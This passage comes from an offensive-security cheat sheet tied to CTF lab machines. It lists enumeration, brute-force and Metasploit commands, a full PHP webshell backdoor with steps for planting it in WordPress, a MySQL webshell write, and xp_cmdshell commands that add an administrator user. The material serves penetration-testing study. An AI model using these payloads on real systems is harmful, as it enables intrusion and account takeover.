| TTPs | |---|------|-------|-----------|------| | 1. | [Archetype](https://github.com/7h3rAm/writeups/blob/master/htb.archetype/writeup.pdf) | [htb#287](https://app.hackthebox.eu/machines/287) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.archetype/killchain.png" width="100" height="100" /> | [`enumerate_proto_smb`](https://github.com/7h3rAm/writeups#enumerate_proto_smb), [`enumerate_proto_smb_anonymous_access`](https://github.com/7h3rAm/writeups#enumerate_proto_smb_anonymous_access), [`enumerate_proto_sql`](https://github.com/7h3rAm/writeups#enumerate_proto_sql), [`enumerate_proto_sql_ssis_dtsconfig`](https://github.com/7h3rAm/writeups#enumerate_proto_sql_ssis_dtsconfig), [`exploit_sql_login`](https://github.com/7h3rAm/writeups#exploit_sql_login), [`exploit_sql_xpcmdshell`](https://github.com/7h3rAm/writeups#exploit_sql_xpcmdshell), [`enumerate_app_powershell_history`](https://github.com/7h3rAm/writeups#enumerate_app_powershell_history), [`privesc_psexec_login`](https://github.com/7h3rAm/writeups#privesc_psexec_login) | --- <a name="enumerate_app_prtg"></a> #### enumerate_app_prtg [⇡](#enumerate) ```shell default credentials: prtgadmin/prtgadmin configuration and backup files (accessed via an open ftp/smb): c:\programdata\paessler\Configuration.dat c:\programdata\paessler\Configuration.old ``` --- <a name="enumerate_app_unrealirc"></a> #### enumerate_app_unrealirc [⇡](#enumerate) ```shell msfconsole use exploit/unix/irc/unreal_ircd_3281_backdoor set rhost <targetip> set rport <targetport> exploit ``` [+] https://snowscan.io/htb-writeup-irked/ --- <a name="enumerate_app_webmin"></a> #### enumerate_app_webmin [⇡](#enumerate) ```shell view any file - even root owned, run perl cgi scripts msf: auxiliary/admin/webmin/file_disclosure can view /etc/ldap.secret file that might give credentials can be used to run a perl cgi script (uploaded via some other means) to gain root reverse shell download shadow file and try cracking hashes download ssh authorized_keys for users (names obtained from shadow file), use edb:5720 and "ssh -i" ``` --- <a name="enumerate_app_wordpress"></a> #### enumerate_app_wordpress [⇡](#enumerate) ```shell default creds: admin/password look for phpmyadmin, plugins directories look for wp-config.php file (via an open smb/ftp share) => contains db creds, useful for phpmyadmin and ssh enumerate authors: http://192.168.92.167:<targetport>/?author=1 => will show username as "AUTHOR ARCHIVES: <username>" http://192.168.92.167:<targetport>/?author=2 => will not show username if author id is invalid wpuser http://192.168.92.134/ usernames wpscan --url http://192.168.92.134:80/ -e vp,vt,tt,cb,dbe,u,m bruteforce wordpress login: wpscan --url http://192.168.92.134 -P fsocity.dic.trimmed -U elliot wpscan --url http://192.168.92.169/backup_wordpress/ -P /usr/share/seclists/Passwords/Common-Credentials/10k-most-common.txt -U admin,john wpscan --disable-tls-checks --url https://192.168.92.165:12380/blogblog/ -P $HOME/toolbox/vulnhub/mrrobot1/pass.list -U elliot hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.92.169 http-post-form "/backup_wordpress/wp-login.php:log=admin&pwd=^PASS^:ERROR" wordpress to shell: #1 add webshell via /wp-admin/theme-editor.php?file=404.php a. "Appearance" -> "Editor" b. select "404 Template" (404.php) c. add php backdoor before the `<?php get_footer(); ?>` line and click "Update File" d. example php backdoor: /usr/share/webshells/php/php-reverse-shell.php e. run local netcat listener f. visit a non-existing page: http://192.168.92.191/wordpress/?p=<attackerport>99 #2 add webshell @ /wp-admin/ a. "Appearance" -> "Editor" b. select "Theme Footer" (footer.php) c. add php backdoor at the end of file and click "Update File" d. example php backdoor: <!-- Inpired by DK's Simple PHP backdoor (http://michaeldaw.org) --> <?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); exec($cmd, $results); foreach( $results as $r ) { echo $r."<br/>"; } echo "</pre>"; die; } ?> /*Usage: http://domain/path?cmd=cat+/etc/passwd*/ e. visit http://192.168.92.169/backup_wordpress/?cmd=cat%20/etc/passwd to run commands f. result will be concatenated to the end of the page #3 add webshell via media file @ /wp-admin/plugin-install.php a. "Upload plugin" -> "Browse" b. example php backdoor: <!-- Inpired by DK's Simple PHP backdoor (http://michaeldaw.org) --> <?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); exec($cmd, $results); foreach( $results as $r ) { echo $r."<br/>"; } echo "</pre>"; die; } ?> /*Usage: http://domain/path?cmd=cat+/etc/passwd*/ c. plugin install might fail, but php file will be uploaded as a media file d. visit http://192.168.92.169/backup_wordpress/wp-admin/upload.php to confirm file upload e. use http://192.168.92.169/backup_wordpress/wp-content/uploads/<year>/<monthid>/<filename>.php?cmd=cat%20/etc/passwd to run commands #4 metasploit: msf> use exploit/unix/webapp/wp_admin_shell_upload msf exploit(unix/webapp/wp_admin_shell_upload) > set rhost 192.168.92.169 msf exploit(unix/webapp/wp_admin_shell_upload) > set targeturi /backup-wordpress msf exploit(unix/webapp/wp_admin_shell_upload) > set username john msf exploit(unix/webapp/wp_admin_shell_upload) > set password enigma msf exploit(unix/webapp/wp_admin_shell_upload) > exploit extract hashes from wp mysql db and crack via john: select concat_ws(':', user_login, user_pass) from wp_users; john --wordlist=/usr/share/wordlists/rockyou.txt hashes.wp ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Blocky](https://github.com/7h3rAm/writeups/blob/master/htb.blocky/writeup.pdf) | [htb#48](https://app.hackthebox.eu/machines/48) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.blocky/killchain.png" width="100" height="100" /> | [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_plugin`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) | | 2. | [LazySysAdmin: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.lazysysadmin1/writeup.pdf) | [vh#205](https://www.vulnhub.com/entry/lazysysadmin-1,205/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.lazysysadmin1/killchain.png" width="100" height="100" /> | [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_smb_nullsession`](https://github.com/7h3rAm/writeups#exploit_smb_nullsession), [`exploit_smb_web_root`](https://github.com/7h3rAm/writeups#exploit_smb_web_root), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`exploit_wordpress_template`](https://github.com/7h3rAm/writeups#exploit_wordpress_template), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo) | | 3. | [hackfest2016: Quaoar](https://github.com/7h3rAm/writeups/blob/master/vulnhub.quaoar/writeup.pdf) | [vh#180](https://www.vulnhub.com/entry/hackfest2016-quaoar,180/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.quaoar/killchain.png" width="100" height="100" /> | [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_defaultcreds`](https://github.com/7h3rAm/writeups#exploit_wordpress_defaultcreds), [`exploit_wordpress_plugin_hellodolly`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin_hellodolly), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_mysql_creds`](https://github.com/7h3rAm/writeups#privesc_mysql_creds), [`privesc_credsreuse`](https://github.com/7h3rAm/writeups#privesc_credsreuse) | | 4. | [DC: 6](https://github.com/7h3rAm/writeups/blob/master/vulnhub.dc6/writeup.pdf) | [vh#315](https://www.vulnhub.com/entry/dc-6,315/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.dc6/killchain.png" width="100" height="100" /> | [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_plugin_activitymonitor`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin_activitymonitor), [`privesc_mysql_creds`](https://github.com/7h3rAm/writeups#privesc_mysql_creds), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo), [`privesc_nmap`](https://github.com/7h3rAm/writeups#privesc_nmap) | | 5. | [BSides Vancouver: 2018 (Workshop)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.bsidesvancouver2018workshop/writeup.pdf) | [vh#231](https://www.vulnhub.com/entry/bsides-vancouver-2018-workshop,231/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.bsidesvancouver2018workshop/killchain.png" width="100" height="100" /> | [`enumerate_proto_ftp`](https://github.com/7h3rAm/writeups#enumerate_proto_ftp), [`enumerate_proto_ssh`](https://github.com/7h3rAm/writeups#enumerate_proto_ssh), [`exploit_ssh_bruteforce`](https://github.com/7h3rAm/writeups#exploit_ssh_bruteforce), [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_plugin_hellodolly`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin_hellodolly), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_cron`](https://github.com/7h3rAm/writeups#privesc_cron), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) | --- <a name="enumerate_file_modified_time_window"></a> #### enumerate_file_modified_time_window [⇡](#enumerate) find files modified within a time window ```shell find / -newermt 2020-12-27 ! -newermt 2020-12-30 -type f 2>/def/null ``` [+] https://www.tripwire.com/state-of-security/security-data-protection/passing-offensive-security-certified-professional-exam-oscp/ --- <a name="enumerate_nmap_initial"></a> #### enumerate_nmap_initial [⇡](#enumerate) run nmap initial scans ```shell sudo nmap -Pn -sC -sV -O -oN initial <attackerip> ``` [+] https://medium.com/@ranakhalil101 [+] https://medium.com/@bondo.mike [+] https://www.jibbsec.com/tags/oscplike/ [+] https://0xdf.gitlab.io/tags.html#oscp-like --- <a name="enumerate_nmap_tcp"></a> #### enumerate_nmap_tcp [⇡](#enumerate) run nmap full tcp scans ```shell nmap -Pn -sC -sV -p- --min-rate 10000 -oN tcp <attackerip> ``` [+] https://medium.com/@ranakhalil101 [+] https://medium.com/@bondo.mike [+] https://www.jibbsec.com/tags/oscplike/ [+] https://0xdf.gitlab.io/tags.html#oscp-like --- <a name="enumerate_nmap_udp"></a> #### enumerate_nmap_udp [⇡](#enumerate) run nmap full udp scans ```shell nmap -Pn -sU -p- -oN udp <attackerip> ``` [+] https://medium.com/@ranakhalil101 [+] https://medium.com/@bondo.mike [+] https://www.jibbsec.com/tags/oscplike/ [+] https://0xdf.gitlab.io/tags.html#oscp-like --- <a name="enumerate_proto_distcc"></a> #### enumerate_proto_distcc [⇡](#enumerate) ```shell msf: exploit/unix/misc/distcc_exec ``` --- <a name="enumerate_proto_dns"></a> #### enumerate_proto_dns [⇡](#enumerate) ```shell reverse lookup to find all hostnames associated with an ip: dig +noall +answer -x <ipaddress> @<dnsserver> dns enumeration: dnsenum -o outputfile -f /usr/share/dnsrecon/namelist.txt -o outputfile domain bruteforce: nmap -p 80 --script dns-brute.nse <domain.name> python dnscan.py -d <domain.name> -w ./subdomains-10000.txt zone transfer: dig axfr @<dnsserver> <domain.name> host -t axfr <domain.name> <dnsserver> host -l <domain.name> <dnsserver> ``` --- <a name="enumerate_proto_finger"></a> #### enumerate_proto_finger [⇡](#enumerate) ```shell finger username@<targetip> ``` --- <a name="enumerate_proto_ftp"></a> #### enumerate_proto_ftp [⇡](#enumerate) check if version is vulnerable and exploit is available. check if anonymous access is enabled. check if read permission for sensitive files. check if write permission within webroot/uploads or other critical directories. check if ftp root directory is also http root directory and upload php reverse shell. remember - binary and ascii transfer mode switch ```shell ftp passive mode: ftp -p 192.168.92.192 bruteforce ftp login: use auxiliary/scanner/ftp/ftp_login misc: nmap --script=*ftp* --script-args=unsafe=1 -p 20,21 <targetip> nmap -sV -Pn -vv -p 21 --script=ftp-anon,ftp-bounce,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221 <targetip> hydra -s 21 -C /usr/share/sparta/wordlists/ftp-default-userpass.txt -u -f <targetip> ftp ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [BSides Vancouver: 2018 (Workshop)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.bsidesvancouver2018workshop/writeup.pdf) | [vh#231](https://www.vulnhub.com/entry/bsides-vancouver-2018-workshop,231/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.bsidesvancouver2018workshop/killchain.png" width="100" height="100" /> | [`enumerate_proto_ftp`](https://github.com/7h3rAm/writeups#enumerate_proto_ftp), [`enumerate_proto_ssh`](https://github.com/7h3rAm/writeups#enumerate_proto_ssh), [`exploit_ssh_bruteforce`](https://github.com/7h3rAm/writeups#exploit_ssh_bruteforce), [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_plugin_hellodolly`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin_hellodolly), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_cron`](https://github.com/7h3rAm/writeups#privesc_cron), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) | [+] https://medium.com/@ranakhalil101/my-oscp-journey-a-review-fa779b4339d9 --- <a name="enumerate_proto_http"></a> #### enumerate_proto_http [⇡](#enumerate) identify web server, technology, application. identify versions. run nikto, dirb/dirbuster, gobuster scans. look at robots.txt. look at source code. check for default creds, lfi/rfi, sqli, wordpress ```shell bash /usr/share/sparta/scripts/x11screenshot.sh <targetip> cewl http://<targetip>:<targetport>/ -m 6, "http,https,ssl,soap,http-proxy,http-alt" ## create wordlist by crawling webpage cewl https://<targetip>:<targetport>/ -m 6, "http,https,ssl,soap,http-proxy,http-alt" ## create wordlist by crawling webpage curl -i <targetip> ## check http response headers gobuster -w /usr/share/wordlists/SecLists/Discovery/Web_Content/cgis.txt -u http://<targetip>:<targetport> -s "200,204,301,307,403,500" gobuster -w /usr/share/wordlists/SecLists/Discovery/Web_Content/cgis.txt -u https://<targetip>:<targetport> -s "200,204,301,307,403,500" gobuster -w /usr/share/wordlists/SecLists/Discovery/Web_Content/common.txt -u http://<targetip>:<targetport> -s "200,204,301,307,403,500" gobuster -w /usr/share/wordlists/SecLists/Discovery/Web_Content/common.txt -u http://<targetip>:<targetport> -s "200,204,301,307,403,500" gobuster -w /usr/share/wordlists/SecLists/Discovery/Web_Content/common.txt -u https://<targetip>:<targetport> -s "200,204,301,307,403,500" gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://<taregtip>/ -t 20 -U <username> -P <password> hydra -l <username> -P /usr/share/wordlists/rockyou.txt <targetip> http-get / hydra -l <username> -P /usr/share/wordlists/rockyou.txt <targetip> http-head / nc -v -n -w1 <targetip> <targetport> ## netcat to grab banner nikto -o "[OUTPUT].txt" -p <targetport> -h <targetip> nmap -Pn -sV -sC -vvvvv -p<targetport> <targetip> -oA [OUTPUT] w3m -dump <targetip>/robots.txt wafw00f http://<targetip>:<targetport>, "http,https,ssl,soap,http-proxy,http-alt" ## check if server is behind a web app firewall wafw00f https://<targetip>:<targetport>, "http,https,ssl,soap,http-proxy,http-alt" ## check if server is behind a web app firewall whatweb <targetip>:<targetport> --color=never --log-brief="[OUTPUT].txt" ## identify web technology ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [InfoSec Prep: OSCP](https://github.com/7h3rAm/writeups/blob/master/vulnhub.infosecpreposcp/writeup.pdf) | [vh#508](https://www.vulnhub.com/entry/infosec-prep-oscp,508/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.infosecpreposcp/killchain.png" width="100" height="100" /> | [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`exploit_ssh_privatekeys`](https://github.com/7h3rAm/writeups#exploit_ssh_privatekeys), [`privesc_lxc_bash`](https://github.com/7h3rAm/writeups#privesc_lxc_bash) | | 2. | [Year of the Fox](https://github.com/7h3rAm/writeups/blob/master/thm.yotf/writeup.pdf) | [tryhackme#yotf](https://tryhackme.com/room/yotf) | <img src="https://github.com/7h3rAm/writeups/blob/master/thm.yotf/killchain.png" width="100" height="100" /> | [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`exploit_command_injection`](https://github.com/7h3rAm/writeups#exploit_command_injection), [`privesc_env_relative_path`](https://github.com/7h3rAm/writeups#privesc_env_relative_path) | | 3. | [Buff](https://github.com/7h3rAm/writeups/blob/master/htb.buff/writeup.pdf) | [htb#263](https://app.hackthebox.eu/machines/263) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.buff/killchain.png" width="100" height="100" /> | [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`exploit_gymsystem_rce`](https://github.com/7h3rAm/writeups#exploit_gymsystem_rce), [`exploit_cloudme_bof`](https://github.com/7h3rAm/writeups#exploit_cloudme_bof) | | 4. | [Bashed](https://github.com/7h3rAm/writeups/blob/master/htb.bashed/writeup.pdf) | [htb#118](https://app.hackthebox.eu/machines/118) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.bashed/killchain.png" width="100" height="100" /> | [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`exploit_python_reverseshell`](https://github.com/7h3rAm/writeups#exploit_python_reverseshell), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo), [`privesc_cron_rootjobs`](https://github.com/7h3rAm/writeups#privesc_cron_rootjobs) | | 5. | [BSides Vancouver: 2018 (Workshop)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.bsidesvancouver2018workshop/writeup.pdf) | [vh#231](https://www.vulnhub.com/entry/bsides-vancouver-2018-workshop,231/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.bsidesvancouver2018workshop/killchain.png" width="100" height="100" /> | [`enumerate_proto_ftp`](https://github.com/7h3rAm/writeups#enumerate_proto_ftp), [`enumerate_proto_ssh`](https://github.com/7h3rAm/writeups#enumerate_proto_ssh), [`exploit_ssh_bruteforce`](https://github.com/7h3rAm/writeups#exploit_ssh_bruteforce), [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_plugin_hellodolly`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin_hellodolly), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_cron`](https://github.com/7h3rAm/writeups#privesc_cron), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) | --- <a name="enumerate_proto_ldap"></a> #### enumerate_proto_ldap [⇡](#enumerate) ```shell ldapsearch -x -s base -h <targetip> -p 389 ``` --- <a name="enumerate_proto_mssql"></a> #### enumerate_proto_mssql [⇡](#enumerate) ```shell hydra -s <targetport> -C /usr/share/sparta/wordlists/mssql-default-userpass.txt -u -f <targetip> mssql hydra -ufl /usr/share/wordlists/metasploit/unix_users.txt -P /usr/share/wordlists/metasploit/unix_passwords.txt mssql://<targetip> nmap --script=ms-sql-* --script-args mssql.instance-port=1433 <targetip> nmap -Pn -n -sS --script=ms-sql-xp-cmdshell.nse <targetip> -p1433 --script-args mssql.username=sa,mssql.password=<sql_password>,ms-sql-xp-cmdshell.cmd="net user anderson cooper /add" nmap -Pn -n -sS --script=ms-sql-xp-cmdshell.nse <targetip> -p1433 --script-args mssql.username=<sql_user>,mssql.password=<sql_password>,ms-sql-xp-cmdshell.cmd="net localgroup administrators anderson /add" nmap -vv -sV -Pn -p <targetport> --script=ms-sql-info,ms-sql-config,ms-sql-dump-hashes --script-args=mssql.instance-port=%s,smsql.username-sa,mssql.password-sa <targetip> ``` --- <a name="enumerate_proto_mysql"></a> #### enumerate_proto_mysql [⇡](#enumerate) ```shell nmap --script=mysql-* <targetip> bruteforce: hydra -ufl /usr/share/wordlists/metasploit/unix_users.txt -P /usr/share/wordlists/metasploit/unix_passwords.txt mysql://<targetip> nmap -p 3306 --script mysql-brute --script-args userdb=/usr/share/wordlists/mysql_users.txt,passdb=/usr/share/wordists/rockyou.txt -vv <targetip> create a reverse shell: select '<?php exec($_GET["cmd"]); ?>' from store into dumpfile '/var/www/https/blogblog/wp-content/uploads/shell.php' udf: if mysql is running as root AND /usr/lib/lib_mysqludf_sys.so file is present, we can privesc nmap -sV -Pn -vv -script=mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 <targetip> -p <targetport> hydra -s <targetport> -C ./wordlists/mysql-default-userpass.txt -u -f <targetip> mysql ``` --- <a name="enumerate_proto_nfs"></a> #### enumerate_proto_nfs [⇡](#enumerate) ```shell nmap -sV --script=nfs-* <targetip> showmount -e <targetip> ``` --- <a name="enumerate_proto_oracle"></a> #### enumerate_proto_oracle [⇡](#enumerate) ```shell msfcli auxiliary/scanner/oracle/tnslsnr_version rhosts=<targetip> E msfcli auxiliary/scanner/oracle/sid_enum rhosts=<targetip> E tnscmd10g status -h <targetip> hydra -uf -P /usr/share/wordlists/metasploit/unix_passwords.txt <targetip> -s 1521 oracle-listener ``` --- <a name="enumerate_proto_postgres"></a> #### enumerate_proto_postgres [⇡](#enumerate) ```shell hydra -s <targetport> -C /usr/share/sparta/wordlists/postgres-default-userpass.txt -u -f <targetip> postgres hydra -ufl /usr/share/wordlists/metasploit/unix_users.txt -P /usr/share/wordlists/metasploit/unix_passwords.txt <targetip> -s 1521 postgres ``` --- <a name="enumerate_proto_rdp"></a> #### enumerate_proto_rdp [⇡](#enumerate) ```shell perl /usr/share/sparta/scripts/rdp-sec-check.pl <targetip>:<targetport> ncrack -vv --user administrator -P /usr/share/wordlists/rockyou.txt rdp://<targetip> ``` --- <a name="enumerate_proto_rpc"></a> #### enumerate_proto_rpc [⇡](#enumerate) ```shell rpcinfo -p <targetip> ``` --- <a name="enumerate_proto_smb"></a> #### enumerate_proto_smb [⇡](#enumerate) ```shell locate all smb scripts on kali and run them to gather details: locate *.nse | grep smb try enum4linux to get open shares, permissions and local users: enum4linux -a <targetip> nbtscan -vhr <targetip> scans: nmap -p139,445 --script smb-vuln-* --script-args=unsafe=1 <targetip> nmap -p139,445 --script smb-enum-* --script-args=unsafe=1 <targetip> null sessions: bash -c "echo 'srvinfo' | rpcclient -U % <targetip>" groups: nmap -vv -p139,445 --script=smb-enum-groups <targetip> users: bash -c "echo 'enumdomusers' | rpcclient -U % <targetip>" admins: net rpc group members "Domain Admins" -U % -I <targetip> shares: nmap -vv -p139,445 --script=smb-enum-shares <targetip> sessions: nmap -vv -p139,445 --script=smb-enum-sessions <targetip> policies: nmap -vv -p139,445 --script=smb-enum-domains <targetip> version: use auxiliary/scanner/smb/smb_version bruteforce: use auxiliary/scanner/smb/smb_login bash -c "echo 'enumdomusers' | rpcclient <targetip> -U%" bash -c "echo 'srvinfo' | rpcclient <targetip> -U%" bash /usr/share/sparta/scripts/smbenum.sh <targetip> enum4linux <targetip> nbtscan -v -h <targetip> net rpc group members "Domain Admins" -I <targetip> -U% nmap -p<targetport> --script=smb-enum-domains <targetip> -vvvvv nmap -p<targetport> --script=smb-enum-groups <targetip> -vvvvv nmap -p<targetport> --script=smb-enum-sessions <targetip> -vvvvv nmap -p<targetport> --script=smb-enum-shares <targetip> -vvvvv nmap -sV -Pn -vv -p <targetport> --script=smb-vuln* --script-args=unsafe=1 <targetip> python /usr/share/doc/python-impacket-doc/examples/samrdump.py <targetip> <targetport>/SMB smbclient -L <targetip> smbclient //<targetip>/admin$ -U john smbclient //<targetip>/ipc$ -U john smbclient //<targetip>/tmp smbclient \\<targetip>\ipc$ -U john winexe -U username //<targetip> "cmd.exe" --system ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Archetype](https://github.com/7h3rAm/writeups/blob/master/htb.archetype/writeup.pdf) | [htb#287](https://app.hackthebox.eu/machines/287) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.archetype/killchain.png" width="100" height="100" /> | [`enumerate_proto_smb`](https://github.com/7h3rAm/writeups#enumerate_proto_smb), [`enumerate_proto_smb_anonymous_access`](https://github.com/7h3rAm/writeups#enumerate_proto_smb_anonymous_access), [`enumerate_proto_sql`](https://github.com/7h3rAm/writeups#enumerate_proto_sql), [`enumerate_proto_sql_ssis_dtsconfig`](https://github.com/7h3rAm/writeups#enumerate_proto_sql_ssis_dtsconfig), [`exploit_sql_login`](https://github.com/7h3rAm/writeups#exploit_sql_login), [`exploit_sql_xpcmdshell`](https://github.com/7h3rAm/writeups#exploit_sql_xpcmdshell), [`enumerate_app_powershell_history`](https://github.com/7h3rAm/writeups#enumerate_app_powershell_history), [`privesc_psexec_login`](https://github.com/7h3rAm/writeups#privesc_psexec_login) | --- <a name="enumerate_proto_smb_anonymous_access"></a> #### enumerate_proto_smb_anonymous_access [⇡](#enumerate) open shares, anonymous logins ```shell # connect to and explore smb share: smbclient -N -L \\\\<targetip> smbclient -N \\\\<targetip>\\$share # look for null sessions "allows sessions using username '', password ''", use smbclient to connect and explore smb share: enum4linux -a <targetip> smbclient -U "" //<targetip>/share$ (password: "") smbclient //<targetip>/share$ -U lazysysadmin -p 445 ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Archetype](https://github.com/7h3rAm/writeups/blob/master/htb.archetype/writeup.pdf) | [htb#287](https://app.hackthebox.eu/machines/287) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.archetype/killchain.png" width="100" height="100" /> | [`enumerate_proto_smb`](https://github.com/7h3rAm/writeups#enumerate_proto_smb), [`enumerate_proto_smb_anonymous_access`](https://github.com/7h3rAm/writeups#enumerate_proto_smb_anonymous_access), [`enumerate_proto_sql`](https://github.com/7h3rAm/writeups#enumerate_proto_sql), [`enumerate_proto_sql_ssis_dtsconfig`](https://github.com/7h3rAm/writeups#enumerate_proto_sql_ssis_dtsconfig), [`exploit_sql_login`](https://github.com/7h3rAm/writeups#exploit_sql_login), [`exploit_sql_xpcmdshell`](https://github.com/7h3rAm/writeups#exploit_sql_xpcmdshell), [`enumerate_app_powershell_history`](https://github.com/7h3rAm/writeups#enumerate_app_powershell_history), [`privesc_psexec_login`](https://github.com/7h3rAm/writeups#privesc_psexec_login) | --- <a name="enumerate_proto_smtp"></a> #### enumerate_proto_smtp [⇡](#enumerate) ```shell smtp-user-enum -M VRFY -U /usr/share/metasploit-framework/data/wordlists/unix_users.txt -t <targetip> -p <targetport> smtp-user-enum -M EXPN -U /usr/share/metasploit-framework/data/wordlists/unix_users.txt -t <targetip> -p <targetport> smtp-user-enum -M RCPT -U /usr/share/metasploit-framework/data/wordlists/unix_users.txt -t <targetip> -p <targetport> # send email: swaks --to [email protected] --from [email protected] --server 192.168.92.167:2525 --body "My kid will be a soccer player" --header "Subject: My kid will be a soccer player" ``` --- <a name="enumerate_proto_snmp"></a> #### enumerate_proto_snmp [⇡](#enumerate) ```shell snmpcheck -t <targetip> nmap -sU -p 161 --script=*snmp* <targetip> xprobe2 -v -p udp:161:open <targetip> use auxiliary/scanner/snmp/snmp_login use auxiliary/scanner/snmp/snmp_enum enumerate open ports, running services and applications: snmpwalk -v2c -c public <targetip> . snmp-check -t 5 -c public <targetip> scan using multiple community strings: echo public >community echo private >>community echo manager >>community for ip in $(seq 200 254); do echo 10.11.1.${ip}; done >ips onesixtyone -c community -i ips onesixtyone -c /usr/share/wordlists/dirb/small.txt <targetip> enumerate windows users: snmpwalk -c public -v1 <IP> 1.3.6.1.4.1.77.1.2.25 for i in $(cat /usr/share/wordlists/metasploit/unix_users.txt); do snmpwalk -v 1 -c $i 192.168.1.200; done | grep -e "Timeout" enumerate current windows processes: snmpwalk -c public -v1 <IP> 1.3.6.1.2.1.25.4.2.1.2 enumerate windows open tcp ports: snmpwalk -c public -v1 <IP> 1.3.6.1.2.1.6.13.1.3 enumerate installed software: snmpwalk -c public -v1 <IP> 1.3.6.1.2.1.25.6.3.1.2 ``` --- <a name="enumerate_proto_sql"></a> #### enumerate_proto_sql [⇡](#enumerate) ```shell locate all sql scripts on kali and run them to gather details: locate *.nse | grep sql ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Archetype](https://github.com/7h3rAm/writeups/blob/master/htb.archetype/writeup.pdf) | [htb#287](https://app.hackthebox.eu/machines/287) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.archetype/killchain.png" width="100" height="100" /> | [`enumerate_proto_smb`](https://github.com/7h3rAm/writeups#enumerate_proto_smb), [`enumerate_proto_smb_anonymous_access`](https://github.com/7h3rAm/writeups#enumerate_proto_smb_anonymous_access), [`enumerate_proto_sql`](https://github.com/7h3rAm/writeups#enumerate_proto_sql), [`enumerate_proto_sql_ssis_dtsconfig`](https://github.com/7h3rAm/writeups#enumerate_proto_sql_ssis_dtsconfig), [`exploit_sql_login`](https://github.com/7h3rAm/writeups#exploit_sql_login), [`exploit_sql_xpcmdshell`](https://github.com/7h3rAm/writeups#exploit_sql_xpcmdshell), [`enumerate_app_powershell_history`](https://github.com/7h3rAm/writeups#enumerate_app_powershell_history), [`privesc_psexec_login`](https://github.com/7h3rAm/writeups#privesc_psexec_login) | --- <a name="enumerate_proto_sql_ssis_dtsconfig"></a> #### 